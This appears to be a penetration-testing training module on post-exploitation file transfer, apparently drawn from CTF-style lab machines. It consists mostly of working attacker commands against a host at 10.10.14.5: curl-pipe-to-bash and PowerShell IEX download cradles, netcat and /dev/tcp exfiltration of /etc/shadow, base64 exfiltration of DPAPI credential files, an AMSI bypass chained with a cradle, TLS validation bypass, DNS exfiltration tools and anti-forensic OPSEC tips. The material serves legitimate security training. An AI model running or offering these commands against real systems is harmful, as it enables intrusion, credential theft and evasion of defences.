Back to All Modules

File Transfer Methods

#Overview

Transferring tools, payloads, and exfiltrating data between the attacker machine and the compromised target is a fundamental post-exploitation operation. Different scenarios (firewall restrictions, available tools, file size) demand different techniques. Always have multiple methods ready -- the first one may be blocked.

#Prerequisites

  • Shell on target system
  • Attacker machine with web server, SMB server, or netcat listener
  • Knowledge of target's firewall rules and available tools

#Exploitation / Execution

#Linux: wget and curl

# wget (most common)
wget http://10.10.14.5/linpeas.sh
wget http://10.10.14.5/chisel -O /tmp/chisel

# curl
curl http://10.10.14.5/linpeas.sh -o linpeas.sh
curl -s http://10.10.14.5/linpeas.sh | bash   # Download and execute in one line
BASH

#Linux: Netcat File Transfer

# On attack box (sender):
nc -lvnp 4444 < linpeas.sh

# On target (receiver):
nc 10.10.14.5 4444 > linpeas.sh

# Reverse direction (exfiltration):
# On attack box (receiver):
nc -lvnp 4444 > exfiltrated_file.txt
# On target (sender):
nc 10.10.14.5 4444 < /etc/shadow
BASH

#Linux: /dev/tcp (Pure Bash)

# Requires bash with /dev/tcp compiled in (most are)
# Download:
exec 3<>/dev/tcp/10.10.14.5/80
echo -e "GET /linpeas.sh HTTP/1.0\r\n\r\n" >&3
cat <&3 > linpeas.sh

# Exfiltrate:
cat /etc/shadow > /dev/tcp/10.10.14.5/4444
BASH

#Linux: Base64 Encoding

# For small files when no network transfer is possible
# On target:
base64 -w 0 secret.txt
# Copy the base64 output manually

# On attacker:
echo "<BASE64_STRING>" | base64 -d > secret.txt
BASH

#Windows: certutil.exe

rem The Swiss Army knife of Windows file transfer
certutil -urlcache -f http://10.10.14.5/nc64.exe C:\Windows\Temp\nc64.exe
certutil -urlcache -f http://10.10.14.5/chisel.exe c:\windows\temp\chisel.exe
certutil -urlcache -split -f http://10.10.14.5/payload.exe
CMD

#Windows: bitsadmin

rem BITSAdmin (Background Intelligent Transfer Service)
bitsadmin /transfer myJob /download /priority high http://10.10.14.5/nc64.exe C:\Windows\Temp\nc64.exe
CMD

#Windows: PowerShell Web Client

# Invoke-WebRequest (IWR) -- PowerShell 3+
Invoke-WebRequest -Uri http://10.10.14.5/nc64.exe -OutFile C:\Windows\Temp\nc64.exe
iwr http://10.10.14.5/nc64.exe -outfile nc64.exe

# Invoke-RestMethod (IRM)
Invoke-RestMethod -Uri http://10.10.14.5/nc64.exe -OutFile C:\Windows\Temp\nc64.exe

# .NET WebClient
(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/nc64.exe','C:\Windows\Temp\nc64.exe')
(New-Object Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1') | IEX

# PowerShell 2.0 compatible
$webclient = New-Object System.Net.WebClient
$webclient.DownloadFile("http://10.10.14.5/nc64.exe","C:\Windows\Temp\nc64.exe")
POWERSHELL

#Windows: Base64 Encoding/Decoding

# Encode file
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\path\to\file"))
# Decode on attacker
echo <BASE64> | base64 -d > file

# Decode on Windows
[IO.File]::WriteAllBytes("C:\Windows\Temp\file.exe", [Convert]::FromBase64String("<BASE64>"))

# Certificate-style base64 (with header/footer)
certutil -encode payload.exe payload.b64
certutil -decode payload.b64 payload.exe
POWERSHELL

Real example from Access: DPAPI credential files and masterkeys were exfiltrated via base64 encoding:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\security\AppData\Roaming\Microsoft\Credentials\51AB..."))
POWERSHELL

#Hosting Files (Attacker Side)

Python HTTP Server (most common):

python3 -m http.server 80   # Serves current directory
python3 -m http.server 8000 # On alternative port
python -m SimpleHTTPServer 80  # Python 2
BASH

Impacket SMB Server (useful when HTTP is blocked):

# Host files via SMB share
impacket-smbserver -smb2support share ./
# On Windows target:
copy \\10.10.14.5\share\nc64.exe C:\Windows\Temp\nc64.exe
BASH

Quick nginx/apache:

# If you need specific headers or authentication
nginx -c /dev/shm/nginx.conf  # Custom minimal nginx config
BASH

FTP Server:

# Python pyftpdlib
python3 -m pyftpdlib -p 21 -w
# On target: ftp 10.10.14.5
BASH

#SCP/SFTP (From Attacker to Linux Target)

# Upload
scp linpeas.sh user@target:/tmp/
# Download
scp user@target:/etc/shadow ./

# sftp interactive
sftp user@target
put linpeas.sh
get /etc/shadow
BASH

#Evil-WinRM Upload/Download

# From Evil-WinRM session:
upload SharpHound.exe         # Upload from current dir to C:\Windows\Temp\
download 2024_BloodHound.zip # Download file from target

# Specify custom destination:
upload SharpHound.exe C:\Users\Public\sh.exe
POWERSHELL

#Netcat File Transfer (Windows)

rem On attacker:
nc -lvnp 4444 < PowerUp.ps1

rem On Windows target (with nc64.exe):
nc64.exe 10.10.14.5 4444 > PowerUp.ps1
CMD

#PowerShell DownloadString Cradle (Inline Execution)

# Classic download cradle (no file written to disk)
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/PowerView.ps1')

# PowerShell 3+ simplified
iex (iwr http://10.10.14.5/PowerView.ps1 -usebasicparsing).Content

# From memory, bypassing disk write entirely
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Invoke-PowerShellTcpOneLine.ps1')"
POWERSHELL

#VBScript/JS Download Cradles (Older Windows)

cscript wget.vbs http://10.10.14.5/payload.exe C:\temp\payload.exe
CMD

#RDP Clipboard and Drive Redirection

# Drive redirection during RDP:
xfreerdp /v:target /u:Administrator /p:Password /drive:share,./tools/
# Shared drive appears as \\tsclient\share on the target
BASH

#Combined AMSI Bypass + Download Cradle

# Professional workflow: AMSI bypass + download + TLS bypass (all-in-one)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/PowerView.ps1')
POWERSHELL

#TLS Certificate Validation Bypass

# Bypass TLS certificate validation for self-signed HTTPS servers
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX(New-Object Net.WebClient).DownloadString('https://10.10.14.5/script.ps1')
POWERSHELL

#evil-winrm Additional Flags

evil-winrm -i 10.10.10.10 -u user -p pass -s /opt/scripts   # Auto-load scripts
evil-winrm -i 10.10.10.10 -u user -p pass -e /opt/exts      # Auto-load extensions
evil-winrm -i 10.10.10.10 -u user -p pass -S                # SSL connection
evil-winrm -i 10.10.10.10 -u user -p pass --timeout 30      # Longer timeout
BASH

#Additional Transfer Methods

# certutil cache clearing (OPSEC cleanup):
certutil -urlcache * delete

# iwr with UseBasicParsing fallback (when IE not initialized):
iwr -UseBasicParsing http://10.10.14.5/tool.exe -o tool.exe
POWERSHELL
# DNS exfiltration for restricted egress:
dnscat2 --host 10.10.14.5 --secret secretkey    # dnscat2 DNS tunnel
python3 dnsteal.py 10.10.14.5                    # DNS data exfiltration

# dev-tunnels/ngrok for when direct connectivity is blocked:
ngrok tcp 4444                                   # Expose local port via ngrok
BASH

#Common Pitfalls

  • certutil: Some Windows builds have certutil removed or blocked by AppLocker.
  • bitsadmin: Jobs can be stuck; use bitsadmin /reset to clear stuck jobs.
  • Python HTTP server: Only serves the directory it's started in; files outside are inaccessible.
  • IWR: PowerShell 2.0 does not have IWR; use .NET WebClient for compatibility.
  • Base64 encoding: Large files produce enormous base64 strings; only suitable for small files (<1MB).
  • PowerShell execution policy: Must use -ExecutionPolicy Bypass or -ep bypass for downloading scripts.
  • SMB to attacker: Windows Defender may block connections to non-domain SMB shares.

#OPSEC Considerations

  • Python HTTP server on port 80 is the most common and least suspicious.
  • certutil -urlcache leaves an entry in the URL cache; clear with certutil -urlcache * delete.
  • BITS transfers are logged in Microsoft-Windows-Bits-Client/Operational event log.
  • Disk writes of tools are forensic artifacts; prefer memory-only execution when possible.
  • Base64 transfer is slow and noisy in command logs but bypasses network controls.
  • Impacket smbserver uses SMB over port 445 which may be monitored.

#Post-Exploitation Value

File transfer enables uploading of enumeration tools (linpeas, WinPEAS, SharpHound), exploitation payloads (MSFvenom stagers, exploit binaries), credential dumping tools (Mimikatz, procdump), and tunnel clients (chisel, ligolo-agent). It also enables exfiltration of sensitive data (SAM/SYSTEM files, NTDS.dit, database files, browser credential stores).

#Cross-References

#Tool References

ToolLink
Netcat (nc64.exe for Windows)https://github.com/int0x33/nc.exe
Impackethttps://github.com/fortra/impacket
Nishanghttps://github.com/samratashok/nishang

#Source Machines

  • Cerberus (Hard, Linux) - python3 -m http.server 8000 for payload hosting, wget on target
  • Cereal (Hard, Windows) - wget + python3 -m http.server 80 for webshell upload, iwr for chisel
  • Help (Easy, Linux) - wget + python3 -m http.server 80 for kernel exploit transfer
  • Support (Easy, Windows) - Evil-WinRM upload SharpHound.exe, upload PowerView.ps1
  • StreamIO (Medium, Windows) - curl from PHP RFI to upload nc64.exe, Evil-WinRM upload/download
  • Access (Easy, Windows) - PowerShell download cradle with START /B for background execution